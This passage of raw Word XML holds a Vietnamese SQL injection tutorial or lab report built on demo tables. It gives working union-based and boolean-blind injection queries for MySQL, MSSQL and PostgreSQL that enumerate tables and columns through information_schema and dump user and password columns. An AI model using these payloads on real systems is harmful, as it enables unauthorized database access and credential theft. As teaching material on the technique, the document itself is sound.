      <w:r>
        <w:t>id,user</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>,pass. Sử dụng câu lệnh này để dump data 2 cột là user và pass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626584D4" w14:textId="3572F43F" w:rsidR="00F51D76" w:rsidRDefault="00F51D76" w:rsidP="00F51D76">
      <w:r w:rsidRPr="00DF2F35">
        <w:t xml:space="preserve">union select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2F35">
        <w:t>,group</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF2F35">
        <w:t>_concat(</w:t>
      </w:r>
      <w:r>
        <w:t>user,pass</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2F35">
        <w:t>),</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2F35">
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:r>
        <w:t>users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC4DBA7" w14:textId="0D149EA5" w:rsidR="00F51D76" w:rsidRDefault="006367D9" w:rsidP="007D74A1">
      <w:r>
        <w:t>MSSQL</w:t>
      </w:r>
      <w:r w:rsidR="003B5EEA">
        <w:t xml:space="preserve">: Giả sử ta có 1 table là demo với 3 cột là </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003B5EEA">
        <w:t>id,name</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003B5EEA">
        <w:t>,hint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496EB338" w14:textId="77777777" w:rsidR="00454BD4" w:rsidRDefault="00454BD4" w:rsidP="00454BD4">
      <w:r>
        <w:t>Sử dụng câu lệnh này để lấy các table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA1957D" w14:textId="77777777" w:rsidR="00C7534F" w:rsidRDefault="003B5EEA" w:rsidP="007D74A1">
      <w:r w:rsidRPr="003B5EEA">
        <w:t xml:space="preserve">select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003B5EEA">
        <w:t>id,name</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003B5EEA">
        <w:t xml:space="preserve"> from demo union select 1,concat('inject:',table_name ) from information_schema.TABLEs ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B73B2B9" w14:textId="1DF567F3" w:rsidR="006367D9" w:rsidRDefault="00454BD4" w:rsidP="007D74A1">
      <w:r>
        <w:t>Sử dụng câu lệnh này để xem các cột trong bảng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8C48C0" w14:textId="77777777" w:rsidR="003B5EEA" w:rsidRDefault="003B5EEA" w:rsidP="00454BD4">
      <w:r w:rsidRPr="003B5EEA">
        <w:t xml:space="preserve">select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003B5EEA">
        <w:t>id,name</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003B5EEA">
        <w:t xml:space="preserve"> from demo union select 1,concat('inject:',column_name ) from information_schema.columns where table_name='demo' ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008F0FE5" w14:textId="61D453B1" w:rsidR="00454BD4" w:rsidRDefault="00454BD4" w:rsidP="00454BD4">
      <w:r>
        <w:t>Sử dụng câu lệnh này để dump data</w:t>
      </w:r>
      <w:r w:rsidR="00C7534F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D067E2E" w14:textId="3A98DF13" w:rsidR="00C7534F" w:rsidRDefault="00C7534F" w:rsidP="00454BD4">
      <w:r w:rsidRPr="00C7534F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C7534F">
        <w:t>id,name</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C7534F">
        <w:t xml:space="preserve"> from demo union select 1,concat(id,name) from demo ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6A8CA1" w14:textId="417E8022" w:rsidR="00454BD4" w:rsidRDefault="00454BD4" w:rsidP="00454BD4">
      <w:r>
        <w:t>POSTGRESQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014E374C" w14:textId="77777777" w:rsidR="00454BD4" w:rsidRDefault="00454BD4" w:rsidP="00454BD4">
      <w:r>
        <w:t>Sử dụng câu lệnh này để lấy các table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AC2053" w14:textId="3D6BB9C7" w:rsidR="00454BD4" w:rsidRDefault="00C7534F" w:rsidP="00454BD4">
      <w:r w:rsidRPr="00C7534F">
        <w:t xml:space="preserve">select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C7534F">
        <w:t>id,name</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C7534F">
        <w:t xml:space="preserve"> from demo union select 1,concat('inject:',table_name ) from information_schema.TABLEs ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5660CF18" w14:textId="77777777" w:rsidR="00454BD4" w:rsidRDefault="00454BD4" w:rsidP="00454BD4">
      <w:r>
        <w:t>Sử dụng câu lệnh này để xem các cột trong bảng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF5A0E0" w14:textId="62317BBB" w:rsidR="00454BD4" w:rsidRDefault="00C7534F" w:rsidP="00454BD4">
      <w:r w:rsidRPr="00C7534F">
        <w:t xml:space="preserve">select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C7534F">
        <w:t>id,name</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C7534F">
        <w:t xml:space="preserve"> from demo union select 1,concat('inject:',COLUMN_NAME ) from information_schema.columns where TABLe_name='demo' ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2988BE" w14:textId="1683FEAA" w:rsidR="00454BD4" w:rsidRDefault="00454BD4" w:rsidP="00454BD4">
      <w:r>
        <w:t>Sử dụng câu lệnh này để dump data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C25A2E" w14:textId="0196F00E" w:rsidR="00C7534F" w:rsidRDefault="00C7534F" w:rsidP="00454BD4">
      <w:r w:rsidRPr="00C7534F">
        <w:t xml:space="preserve">select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C7534F">
        <w:t>id,name</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C7534F">
        <w:t xml:space="preserve"> from demo union select 1,concat('inject:',name ) from demo ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006FB2ED" w14:textId="2EF3CA16" w:rsidR="00454BD4" w:rsidRDefault="00454BD4" w:rsidP="00454BD4">
      <w:r w:rsidRPr="00DF2F35">
        <w:t xml:space="preserve">union select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2F35">
        <w:t>,group</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF2F35">
        <w:t>_concat(</w:t>
      </w:r>
      <w:r>
        <w:t>user,pass</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2F35">
        <w:t>),</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2F35">
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:r>
        <w:t>users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72376E06" w14:textId="7B460F26" w:rsidR="00454BD4" w:rsidRDefault="009D1468" w:rsidP="00454BD4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3C4043"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3C4043"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Boolean-based blind</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3C4043"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C01D4A" w14:textId="05FE768C" w:rsidR="009D1468" w:rsidRDefault="009D1468" w:rsidP="00454BD4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3C4043"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3C4043"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Là một kỹ thuật khai thác sql bằng cách dựa vào kết quả về là true false. Giả sử ta set điều kiện là database có phải tên là csdl hay không. Và server sẽ phản hồi nếu đúng sẽ trả về true và sai thì trả về false. Qua đó ta có thể trích xuất các thông tin trong </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3C4043"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>database ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3C4043"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> kỹ thuật này yêu cầu nhiều thời gian do ta không thể biết được dữ liệu trong đó nên phải đoán và brute force từng ký tự.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E168AC4" w14:textId="7A5A86BD" w:rsidR="009D1468" w:rsidRDefault="009D1468" w:rsidP="00454BD4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3C4043"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3C4043"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Mysql:</w:t>
      </w:r>
      <w:r w:rsidR="0014594A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3C4043"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> database là doansqli2 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27930680" w14:textId="6F461A34" w:rsidR="009D1468" w:rsidRDefault="009D1468" w:rsidP="00454BD4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3C4043"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3C4043"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Ta sử dụng câu lệnh sau đây để brute force sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F683EE3" w14:textId="66518793" w:rsidR="009D1468" w:rsidRDefault="009D1468" w:rsidP="00454BD4">
      <w:r w:rsidRPr="009D1468">
        <w:t xml:space="preserve">select UName from employee where UName='admin' and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009D1468">
        <w:t>substring(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009D1468">
        <w:t>(select database()),1,1)='</w:t>
      </w:r>
      <w:r w:rsidR="0014594A">
        <w:t>a’</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1468">
        <w:t xml:space="preserve"> ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CAED70" w14:textId="5DD65C18" w:rsidR="0014594A" w:rsidRDefault="0014594A" w:rsidP="00454BD4">
      <w:r>
        <w:t>Như trong hình ta kiểm tra tên database với ký tự đầu tiên là chữ mà ta điền vào ta thử với chữ d nó sẽ trả về kết quả còn khi ta thử với ký tự khác nó sẽ không trả về kết quả.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58047C05" w14:textId="794EDF90" w:rsidR="0014594A" w:rsidRDefault="0014594A" w:rsidP="00454BD4">
      <w:r w:rsidRPr="0014594A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78E33887" wp14:editId="29854904">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528" cy="2718224"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E39198" w14:textId="198F8DFA" w:rsidR="0014594A" w:rsidRDefault="00ED66C7" w:rsidP="00454BD4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Sau đó ta tiến hành lấy table_name bằng câu lệnh sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CFF068" w14:textId="5CF866C8" w:rsidR="00ED66C7" w:rsidRDefault="00ED66C7" w:rsidP="00454BD4">
      <w:r w:rsidRPr="00ED66C7">
        <w:t xml:space="preserve">select UName from employee where UName='admin' and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED66C7">
        <w:t>substring(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED66C7">
        <w:t>(select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='e' ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D924C89" w14:textId="5CA23AE6" w:rsidR="00454BD4" w:rsidRDefault="00ED66C7" w:rsidP="007D74A1">
      <w:r>
        <w:t xml:space="preserve">Ta sẽ brute force từng ký tự tên table_name như hình </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">dưới </w:t>
      </w:r>
      <w:r w:rsidR="00E6706B">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E6706B">
        <w:t xml:space="preserve"> Và thu kết quả là talbe employee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BA7B4B" w14:textId="1861A742" w:rsidR="00E6706B" w:rsidRDefault="00E6706B" w:rsidP="007D74A1">
      <w:r>
        <w:t>Lưu ý: trong đây có 3 table ta có thể lấy 1 cái bằng câu lệnh limit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D667EB9" w14:textId="406314B9" w:rsidR="00ED66C7" w:rsidRDefault="00ED66C7" w:rsidP="007D74A1">
      <w:r w:rsidRPr="00ED66C7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="035E6C76" wp14:editId="5E7818FA">
            <wp:extent cx="5943600" cy="981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1710"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="341ED83F" w14:textId="53CD0A10" w:rsidR="00ED66C7" w:rsidRDefault="001A3615" w:rsidP="007D74A1">
      <w:r>
        <w:t>Sau đó ta tiến hành brute force sau khi biết được tên của table là employee bằng câu lệnh sau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9FB0F8" w14:textId="07AA470C" w:rsidR="001A3615" w:rsidRDefault="001A3615" w:rsidP="007D74A1">
      <w:r w:rsidRPr="001A3615">
        <w:t xml:space="preserve">select UName from employee where UName='admin' and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001A3615">
        <w:t>substring(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001A3615">
        <w:t>(select column_name from information_schema.columns where table_name='employee' limit 0,1),1,1)='</w:t>
      </w:r>
      <w:r w:rsidR="00E6706B">
        <w:t>U’</w:t>
      </w:r>
      <w:r w:rsidRPr="001A3615">
        <w:t xml:space="preserve"> ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68090A7E" w14:textId="09824DAA" w:rsidR="001A3615" w:rsidRDefault="001A3615" w:rsidP="007D74A1">
      <w:r w:rsidRPr="001A3615">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="178A6B5A" wp14:editId="117D6299">
            <wp:extent cx="5943600"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8845"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EA3032" w14:textId="37CF716D" w:rsidR="00E6706B" w:rsidRDefault="00E6706B" w:rsidP="007D74A1">
      <w:r>
        <w:t>Sau đó ta tiến hành brute force data trong column sau khi đã brute force tên của column là UName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3F2BF4" w14:textId="450CA0F5" w:rsidR="00E6706B" w:rsidRDefault="00E6706B" w:rsidP="007D74A1">
      <w:r w:rsidRPr="00E6706B">
        <w:t xml:space="preserve">select UName from employee where UName='admin' and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E6706B">
        <w:t>substring(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E6706B">
        <w:t>(select UName from employee limit 0,1),1,1)='a' ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1087A947" w14:textId="570892C3" w:rsidR="00E6706B" w:rsidRDefault="00E6706B" w:rsidP="007D74A1">
      <w:r w:rsidRPr="00E6706B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EF32212" wp14:editId="0BE2211B">
            <wp:extent cx="5943600" cy="97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5360"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C30DC5A" w14:textId="411DF79F" w:rsidR="00E6706B" w:rsidRDefault="00E6706B" w:rsidP="007D74A1">
      <w:r>
        <w:t xml:space="preserve">Ta tiến hành kiểm tra với 2 ký tự là 2 và </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>a ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ký tự sẽ trả về kết quả vậy là user có ký tự đầu tiên là a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B16CA6" w14:textId="4629037C" w:rsidR="00C71D93" w:rsidRDefault="00C71D93" w:rsidP="007D74A1">
      <w:r>
        <w:t>Sau đó ta tiến hành brute force để lấy full data trong đó</w:t>
      </w:r>
      <w:r w:rsidR="0082540B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E779447" w14:textId="7F48282E" w:rsidR="0082540B" w:rsidRDefault="0082540B" w:rsidP="007D74A1">
      <w:r>
        <w:t>MSSQL:</w:t>
      </w:r>
      <w:r w:rsidR="006B07C0">
        <w:t xml:space="preserve"> table là demo và 3 column là </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="006B07C0">
        <w:t>id,name</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="006B07C0">
        <w:t>,hint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFE3D06" w14:textId="15DE818F" w:rsidR="00902FD5" w:rsidRDefault="006B07C0" w:rsidP="007D74A1">
      <w:r>
        <w:t>Với MSSQL ta tiến hành brute force table bằng lệnh sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141D10DC" w14:textId="2DF7DC32" w:rsidR="006B07C0" w:rsidRDefault="006B07C0" w:rsidP="007D74A1">
      <w:r w:rsidRPr="006B07C0">
        <w:t xml:space="preserve">select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006B07C0">
        <w:t>id,name</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006B07C0">
        <w:t xml:space="preserve"> from demo WHERE id=1 and substring((select TABLE_name from information_schema.TABLEs),1,1)='</w:t>
      </w:r>
      <w:r>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="006B07C0">
        <w:t>';</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C73D56" w14:textId="31219A42" w:rsidR="006B07C0" w:rsidRDefault="006B07C0" w:rsidP="007D74A1">
      <w:r>
        <w:t>Do ký tự đầu là d nên sẽ trả về true.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3B07F0" w14:textId="7127A6F9" w:rsidR="006B07C0" w:rsidRDefault="006B07C0" w:rsidP="007D74A1">
      <w:r w:rsidRPr="006B07C0">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27F66D03" wp14:editId="4E33A2C2">
            <wp:extent cx="5943600" cy="147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3835"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="193D85DC" w14:textId="40AF5D83" w:rsidR="006B07C0" w:rsidRDefault="006B07C0" w:rsidP="007D74A1">
      <w:r>
        <w:t>Lần này ta thử ký tự đầu tiên là e nó sẽ trả về false.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A35092" w14:textId="2521D332" w:rsidR="006B07C0" w:rsidRDefault="006B07C0" w:rsidP="007D74A1">
      <w:r w:rsidRPr="006B07C0">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6872859C" wp14:editId="593D70EB">
            <wp:extent cx="5943600" cy="1210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0310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E56B41D" w14:textId="77777777" w:rsidR="006C307E" w:rsidRDefault="006C307E" w:rsidP="006C307E">
      <w:r>
        <w:t xml:space="preserve">PostgreSQL: table là demo và 3 cột là </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>id,name</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>,hint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAFE741" w14:textId="78B260E8" w:rsidR="006B07C0" w:rsidRDefault="006C307E" w:rsidP="007D74A1">
      <w:r>
        <w:t>Đầu tiên ta tiến hành brute force table bằng lệnh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3C9366" w14:textId="3E632D8E" w:rsidR="00D83957" w:rsidRDefault="00D83957" w:rsidP="007D74A1">
      <w:r w:rsidRPr="00D83957">
        <w:t xml:space="preserve">select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D83957">
        <w:t>id,name</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D83957">
        <w:t xml:space="preserve"> from demo where id=1 and substring((select TABLE_NAME from information_schema.tables OFFSET 0 limit 1),1,1)='d';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD765E4" w14:textId="7F08D6A3" w:rsidR="00D83957" w:rsidRDefault="00D83957" w:rsidP="007D74A1">
      <w:r>
        <w:t>offset 0 limit là để ta lấy database đầu tiên trong kết quả trả về</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111F188A" w14:textId="0CF208CF" w:rsidR="00D83957" w:rsidRDefault="00D83957" w:rsidP="007D74A1">
      <w:r w:rsidRPr="00D83957">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03A45C7A" wp14:editId="5D61D33F">
            <wp:extent cx="5943600" cy="1202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2055"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C489669" w14:textId="1EA05493" w:rsidR="00D83957" w:rsidRDefault="00D83957" w:rsidP="007D74A1">
      <w:r>
        <w:t>Khi ta thử với ký tự khác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D94F84" w14:textId="69CDBF3F" w:rsidR="00D83957" w:rsidRDefault="00D83957" w:rsidP="007D74A1">
      <w:r w:rsidRPr="00D83957">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="152EC974" wp14:editId="4C0D4014">
            <wp:extent cx="5943600" cy="1166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6495"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6BB345" w14:textId="70B30DFF" w:rsidR="00E6706B" w:rsidRDefault="006B07C0" w:rsidP="007D74A1">
      <w:r>
        <w:t>Sau đó ta tiến hành brute force column bằng câu lệnh sau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FDB9AC" w14:textId="3B98AF3D" w:rsidR="0075346B" w:rsidRDefault="0075346B" w:rsidP="007D74A1">
      <w:r w:rsidRPr="0075346B">
        <w:t xml:space="preserve">select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0075346B">
        <w:t>id,name</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0075346B">
        <w:t xml:space="preserve"> from demo where id=1 and substring((select column_name from information_schema.columns where table_name='demo' OFFSET 1 limit 1),1,1)='e';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FDEECF" w14:textId="00B5DF1E" w:rsidR="006454FF" w:rsidRDefault="0075346B" w:rsidP="007D74A1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ta nhận được kết quả là false do ký tự đầu tiên là n không phải e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3D2710" w14:textId="5736FB3C" w:rsidR="0075346B" w:rsidRDefault="0075346B" w:rsidP="007D74A1">
      <w:r w:rsidRPr="0075346B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35048104" wp14:editId="30701734">
            <wp:extent cx="5943600" cy="1368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8425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7351025D" w14:textId="43CD5F7B" w:rsidR="0075346B" w:rsidRDefault="0075346B" w:rsidP="007D74A1">
      <w:r>
        <w:t>Thử lại với ký tự là n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CD472D" w14:textId="21F6E5F4" w:rsidR="00C47E33" w:rsidRDefault="0075346B" w:rsidP="007D74A1">
      <w:r w:rsidRPr="0075346B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54EABB90" wp14:editId="050BDDA4">
